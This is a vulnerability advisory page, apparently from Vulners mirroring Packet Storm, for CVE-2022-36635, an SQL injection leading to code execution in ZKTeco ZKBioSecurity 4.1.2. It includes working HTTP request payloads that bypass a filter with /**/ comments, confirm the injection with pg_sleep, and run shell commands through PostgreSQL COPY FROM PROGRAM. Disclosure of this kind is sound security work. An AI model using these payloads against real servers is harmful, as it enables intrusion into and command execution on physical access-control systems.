Vulners
Lucene search
ZKSecurity BIO 4.1.2 SQL Injection / Code Execution
🗓️ 01 Oct 2022 00:00:00Reported by Silton Santos, Caio BurgardtType 
packetstorm🔗 packetstormsecurity.com👁 227 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | ZKSecurity BIO 4.1.2 SQL Injection / Code Execution Vulnerabilities | 3 Oct 202200:00 | – | zdt |
 | CVE-2022-36635 | 7 Oct 202223:15 | – | attackerkb |
 | CVE-2022-36635 | 8 Oct 202202:17 | – | circl |
 | ZKTeco ZKBioSecurity SQL注入漏洞 | 1 Oct 202200:00 | – | cnnvd |
 | ZKTeco ZKBioSecurity SQL Injection Vulnerability | 11 Oct 202200:00 | – | cnvd |
 | CVE-2022-36635 | 7 Oct 202200:00 | – | cve |
 | CVE-2022-36635 | 7 Oct 202200:00 | – | cvelist |
 | EUVD-2022-39338 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-36635 | 7 Oct 202223:15 | – | nvd |
 | CVE-2022-36635 | 7 Oct 202223:15 | – | osv |
10
`#######################ADVISORY INFORMATION#######################
Product: ZKSecurity BIO
Vendor: ZKTeco (
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)
Version Affected: 4.1.2
CVE: CVE-2022-36635
Vulnerability: SQL Injection (with a plus: RCE)
#######################CREDIT#######################
This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.
#######################INTRODUCTION#######################
Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.
#######################VULNERABILITY DETAILS#######################
The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL
query, with only a sanitization filter in front of it. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.
#######################PROOF OF CONCEPT#######################
Note that the request delayed 10s:
POST /baseOpLog.do HTTP/1.1
Host: {HOST}
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION={COOKIE}; menuType=icon-only
Content-Length: 208
list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50
if you use the next query, you can execute remote command:
list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='
#######################END#######################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Oct 2022 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.02081